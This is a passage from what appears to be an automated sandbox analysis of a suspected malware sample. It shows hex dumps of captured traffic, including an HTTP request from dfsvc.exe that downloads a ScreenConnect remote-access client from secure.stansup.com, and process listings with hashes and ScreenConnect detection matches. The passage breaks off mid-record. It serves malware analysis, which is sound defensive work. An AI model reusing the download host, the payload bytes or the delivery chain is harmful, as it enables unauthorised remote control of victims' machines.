                                                                                                                                                                                                                                                        2024-10-25 17:27:44 UTC16384INData Raw: 07 04 07 6f 03 0c 00 06 02 05 07 6f 02 0c 00 06 28 03 09 00 06 6f 06 0c 00 06 28 fb 0b 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3b 04 00 04 02 04 7d 3c 04 00 04 02 05 7d 3d 04 00 04 02 0e 04 7d 3e 04 00 04 02 0e 05 7d 3f 04 00 04 2a 1e 02 7b 3b 04 00 04 2a 1e 02 7b 3c 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 00 0a 2d 1e 28 64 01 00 0a d0 81 00 00 1b 28 3c 01 00 0a 28 0c 05 00 06 6f 8c 0b 00 06 80 1b 07 00 0a de 07 06 28 2d 01 00 0a dc 7e 1b 07 00 0a 2a 00 01 10 00 00 02 00 13 00 27 3a 00 07 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: oo(o(o-,o*29(<};}<}=}>}?*{;*{<*{=*{>*{?*0G*~-:~(,~-(d(<(o(-~*':
                                                                                                                                                                                                                                                        2024-10-25 17:27:45 UTC16384INData Raw: 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 a5 0d 00 06 80 30 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 31 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 ae 0d 00 06 80 36 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 56 02 00 06 2a 22 03 04 28 5c 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 39 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 2f 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 b1 01 00 11 02 7b 39 05 00 04 03 16 28 f0 01 00 2b 0a 12 00 28 7b 08 00 0a 6f 31 02 00 06 2a 36 02 7b 39 05 00 04 03 6f 33 02 00 06 2a 00 00 00 13 30 02 00 1a 00 00 00 b2 01 00 11 02 7b 39
                                                                                                                                                                                                                                                        Data Ascii: sjz(<*.s0*(<*2{1oB*(<*6{o{*(<*6{o{*.s6*(<*"(V*"(\*(<*0{9(+d(zo/*0{9(+({o1*6{9o3*0{9
                                                                                                                                                                                                                                                        2024-10-25 17:27:45 UTC16384INData Raw: 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 04 10 00 06 80 23 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 1b 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 08 10 00 06 80 26 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0b 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 4b 0b 00 06 2a 3a 0f 01 fe 16 4b 01 00 02 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 2b 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c1 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e 73 13 10 00 06 80 32 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 36 03 03 28 1a 02 00 2b 73 32 0a 00 0a 2a 2a 03 6f 33 0a 00 0a 14 fe 03 2a 5e 03 03 6f 34 0a 00 0a 28 bc 01 00 2b 28 f8 0b 00 06 73 35
                                                                                                                                                                                                                                                        Data Ascii: {#(1*(<*J{'{((1*.s#*(<*o*oC*.s&*(<*oC*.s(*(<*"(K*:KoC*.s+*(<*:oC*(<*.s2*(<*6(+s2**o3*^o4(+(s5
                                                                                                                                                                                                                                                        2024-10-25 17:27:45 UTC16384INData Raw: 27 3d 01 00 6d 00 9a 01 fe 02 09 01 10 00 e6 4f 01 00 27 3d 01 00 6d 00 9e 01 06 03 09 01 10 00 d9 bb 00 00 27 3d 01 00 6d 00 a0 01 14 03 09 01 10 00 96 3a 01 00 27 3d 01 00 6d 00 a2 01 1f 03 09 01 10 00 9c ff 00 00 27 3d 01 00 6d 00 a6 01 46 03 81 01 10 00 cc 3a 01 00 27 3d 01 00 35 00 a9 01 5a 03 01 20 10 00 0e e3 00 00 27 3d 01 00 35 00 ab 01 63 03 01 20 10 00 4d 34 01 00 27 3d 01 00 35 00 ae 01 7b 03 01 00 10 00 e9 7f 00 00 27 3d 01 00 35 00 b1 01 80 03 81 00 10 00 cf fc 00 00 27 3d 01 00 3c 03 b2 01 8a 03 01 00 10 00 8d fe 00 00 27 3d 01 00 24 03 b4 01 95 03 01 00 10 00 96 fd 00 00 27 3d 01 00 24 03 b6 01 99 03 01 00 10 00 fa 7f 00 00 27 3d 01 00 35 00 b6 01 9d 03 01 00 10 00 56 91 00 00 27 3d 01 00 35 00 b7 01 a7 03 01 00 10 00 47 91 00 00 27 3d 01
                                                                                                                                                                                                                                                        Data Ascii: '=mO'=m'=m:'=m'=mF:'=5Z '=5c M4'=5{'=5'=<'=$'=$'=5V'=5G'=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        12192.168.2.94973479.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:47 UTC102OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 600864
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:47 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 08 e6 df 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fa 08 00 00 06 00 00 00 00 00 00 8a 12 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 ca be 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `@
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 2c 00 00 11 73 af 07 00 06 0a 06 02 7d 15 03 00 04 28 74 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 75 01 00 0a 28 76 01 00 0a 16 8d 11 00 00 01 28 77 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 ce 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e aa 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 29 07 00 06 73 cf 01 00 0a 25 80 aa 02 00 04 28 33 00 00 2b 6f d0 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d1 01 00 0a 7d 17 03 00 04 11 04 7b 17 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 17 03 00 04 6f 18 03 00 06 28 39 06 00 06 13 06 11 04 7b 17 03 00 04 6f 2c 03 00 06 28 4d 06 00 06 13 07 11 04 7b 17 03 00 04 6f 2d 03 00 06 28 4d 06 00 06 13 08 11 04 7b 17 03 00 04 6f 18 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a 11 0e 13 09 11 05 7b 74 02 00 04 2d 21
                                                                                                                                                                                                                                                        Data Ascii: ,s}(t,rp(u(v(w}H((((~%-&~)s%(3+o8$o}{(,+{o(9{o,(M{o-(M{o(%o{t-!
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 04 6f 0e 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 16 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f bb 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 16 03 00 0a 74 9b 00 00 01 17 6f 17 03 00 0a 26 02 7b 54 00 00 04 14 6f 7a 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0e 07 00 06 8c b6 00 00 02 a2 28 09 03 00 0a 02 7b 54 00 00 04 6f 0e 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f bb 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0c 03 00 0a 6f 0e 02 00 0a 2b 10 02 7b 5a 00
                                                                                                                                                                                                                                                        Data Ascii: o.{To*0b{To,M{Z(o{To{T{Toto&{Toz(<*(<*0Grp%3%{To({To..'+5{Z(o-"(so+{Z
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 70 28 b0 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70 00 00 00 62 00 00 11 73 3f 08 00 06 0a 06 02 7d 94 03 00 04 02 03 28 28 04 00 0a 06 02 28 29 04 00 0a 28 b1 00 00 2b 7d 93 03 00 04 02 28 29 04 00 0a 26 02 28 2a 04 00 0a 6f 2b 04 00 0a 02 28 2a 04 00 0a 02 7b 89 00 00 04 06 fe 06 40 08 00 06 73 2c 04 00 0a 28 b2 00 00 2b 06 fe 06 41 08 00 06 73 2d 04 00 0a 28 b3 00 00 2b 28 b4 00 00 2b 6f 2e 04 00 0a 2a c2 02 28 2f 04 00 0a 02 7e 30 04 00 0a 28 31 04 00 0a 02 20 02 60 00 00 17 28 32 04 00 0a 02 02 fe 06 e0 01 00 06 73 33 04 00 0a 28 34 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02
                                                                                                                                                                                                                                                        Data Ascii: p(+}*0pbs?}((()(+}()&(*o+(*{@s,(+As-(+(+o.*(/~0(1 `(2s3(4*{*"}*{*"}*{*"}*{*"}*
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 6f c7 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28 ab 02 00 06 2c 07 02 28 ab 02 00 06 2a 02 28 94 02 00 06 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 a0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a7 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a7 02 00 06 2a 02 6f 1e 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 9e 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 9e 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a5 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a5 02 00 06 2a 02 6f 1d 04 00 0a 2a d6 02 28 67 05 00 0a 2d 0f 02 28 a2 02 00 06 2c 07 02 28 a2 02 00 06 2a 02 7b
                                                                                                                                                                                                                                                        Data Ascii: o*z{,(,(*(*0Q(g-((h,(*{,((h,(*o*0Q(g-((h,(*{,((h,(*o*(g-(,(*{
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00 00 00 00 02 03 04 05 0e 04 28 7c 03 00 06 02 73 0b 06 00 0a 7d 38 01 00 04 02 02 fe 06 87 03 00 06 73 82 01 00 0a 28 0c 06 00 0a 02 7b 38 01 00 04 02 fe 06 88 03 00 06 73 82 01 00 0a 6f 0d 06 00 0a 02 02 fe 06 89 03 00 06 73 9e 01 00 0a 28 9f 01 00 0a 02 02 fe 06 8a 03 00 06 73 82 01 00 0a 28 0e 06 00 0a 2a 32 02 7b 38 01 00 04 6f 0f 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 10 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33
                                                                                                                                                                                                                                                        Data Ascii: }7*0d(|s}8s({8sos(s(*2{8o*6{8o*0){:(t|:(P+3*0){:(t|:(P+3
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b3 07 00 0a 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b4 07 00 0a 1f 20 17 28 b5 07 00 0a 7d 3b 05 00 04 06 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 a1 04 00 0a 1f 20 73 b6 07 00 0a 7d 3d 05 00 04 06 14 7d 3c 05 00 04 02 06 7b 39 05 00 04 06 fe 06 82 0a 00 06 73 96 07 00 0a 28 9a 01 00 2b de 39 06 7b 3b 05 00 04 2c 0b 06 7b 3b 05 00 04 6f 22 00 00 0a dc 06 7b 3a 05 00 04 2c 0b 06 7b 3a 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 66 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 b0 01 00 06 02 20 16 22 00 00 17 28 32 04 00 0a 02
                                                                                                                                                                                                                                                        Data Ascii: 9o({9o( (};{9o( s}=}<{9s(+9{;,{;o"{:,{:o",o"(f&*4iA5$0J( "(2
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 38 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 38 05 00 06 80 0f 02 00 04 1f 21 1f 10 28 38 05 00 06 80 10 02 00 04 1f 20 1f 10 28 38 05 00 06 80 11 02 00 04 20 c8 00 00 00 28 37 05 00 06 80 12 02 00 04 d0 88 00 00 02 28 bf 00 00 0a 6f 96 08 00 0a 6f 97 08 00 0a 7e 83 05 00 04 fe 06 d9 0a 00 06 73 5f 01 00 0a 28 d2 01 00 2b 7e 83 05 00 04 fe 06 da 0a 00 06 73 5f 01 00 0a 28 21 00 00 2b 0c 28 98 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 44 05 00 06 28 c6 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 98 08 00 0a 02 6f 44 05 00 06 28 c6 04 00 06 7e aa 00 00 0a 02 6f b2 03 00 0a 6f 99 08 00 0a 2a 2e 28 c5 04 00 06 6f 61 05 00 06 2a 2e 28 c5 04 00 06 6f 47 05 00 06 2a 2e 28 c5 04 00 06 6f 4d 05
                                                                                                                                                                                                                                                        Data Ascii: (8(8!(8 (8 (7(oo~s_(+~s_(!+(%-&(oD(*~**(oD(~oo*.(oa*.(oG*.(oM
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 00 80 00 00 5f 16 fe 03 2a 3e 1f fe 73 0b 0c 00 06 25 02 7d 35 06 00 04 2a 00 00 00 13 30 03 00 59 00 00 00 3f 01 00 11 73 be 0b 00 06 0a 06 03 7d f9 05 00 04 06 7b f9 05 00 04 28 15 02 00 2b 2d 02 15 2a 02 28 10 06 00 06 06 fe 06 bf 0b 00 06 73 a4 09 00 0a 28 16 02 00 2b 7e d0 05 00 04 25 2d 17 26 7e cf 05 00 04 fe 06 8d 0b 00 06 73 76 05 00 0a 25 80 d0 05 00 04 16 28 22 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 40 01 00 11 73 a5 09 00 0a 0a 06 03 7d a6 09 00 0a 02 06 fe 06 a7 09 00 0a 73 a8 09 00 0a 15 28 17 02 00 2b 7e a9 09 00 0a 25 2d 17 26 7e aa 09 00 0a fe 06 ab 09 00 0a 73 ac 09 00 0a 25 80 a9 09 00 0a 28 18 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 41 01 00 11 7e ad 09 00 0a 72 16 40 00 70 02 8c 65 00 00 01 28 23 06 00 0a 6f ae 09 00 0a 0a
                                                                                                                                                                                                                                                        Data Ascii: _*>s%}5*0Y?s}{(+-*(s(+~%-&~sv%("+*0E@s}s(+~%-&~s%(+*0.A~r@pe(#o
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 87 02 00 04 02 28 46 00 00 0a 2a 1e 02 7b 84 02 00 04 2a 1e 02 7b 85 02 00 04 2a 1e 02 7b 86 02 00 04 2a 1e 02 7b 87 02 00 04 2a 32 02 7b 82 02 00 04 6f 7e 06 00 0a 2a 36 02 7b 83 02 00 04 03 6f 18 0b 00 0a 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a e6 02 28 d7 00 00 0a 02 20 06 20 00 00 17 28 32 04 00 0a 02 16 28 a2 00 00 0a 02 17 6f fb 01 00 0a 02 17 28 19 0b 00 0a 02 28 1a 0b 00 0a 02 28 ba 01 00 0a 28 f8 01 00 0a 2a 76 02 28 29 08 00 0a 25 20 00 00 00 80 6f eb 04 00 0a 25 20 88 00 00 00 6f ec 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 90 01 00 11 0f 01 28 ef 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f2 01 00 0a 28 1b 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f2 01 00 0a 28 86 00 00 0a 73 41 05 00 0a 2a 02 02 28 f0 01 00 0a 02 28 ec 01 00 0a 02 28
                                                                                                                                                                                                                                                        Data Ascii: (F*{*{*{*{*2{o~*6{o*{*"}*( (2(o((((*v()% o% o*0(,+((((,((sA*(((


                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:13:27:12
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\khwHsyfsJ1.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\khwHsyfsJ1.exe"
                                                                                                                                                                                                                                                        Imagebase:0xb60000
                                                                                                                                                                                                                                                        File size:83'360 bytes
                                                                                                                                                                                                                                                        MD5 hash:24686214DADBE686482FB77F11010DF4
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                        Start time:13:27:12
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                        Imagebase:0x1d43ce00000
                                                                                                                                                                                                                                                        File size:24'856 bytes
                                                                                                                                                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2495260176.000001D4592FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2474748099.000001D43EE6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                        Start time:13:27:13
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                        Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                        Start time:13:27:13
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652
                                                                                                                                                                                                                                                        Imagebase:0x830000
                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                        Start time:13:27:13
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844
                                                                                                                                                                                                                                                        Imagebase:0x830000
                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                        Start time:13:27:13
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                        Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                        Start time:13:27:15
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                        Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                        Start time:13:27:51
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                        Imagebase:0xa30000
                                                                                                                                                                                                                                                        File size:600'864 bytes
                                                                                                                                                                                                                                                        MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1821045586.0000000000A32000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1831273975.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:11
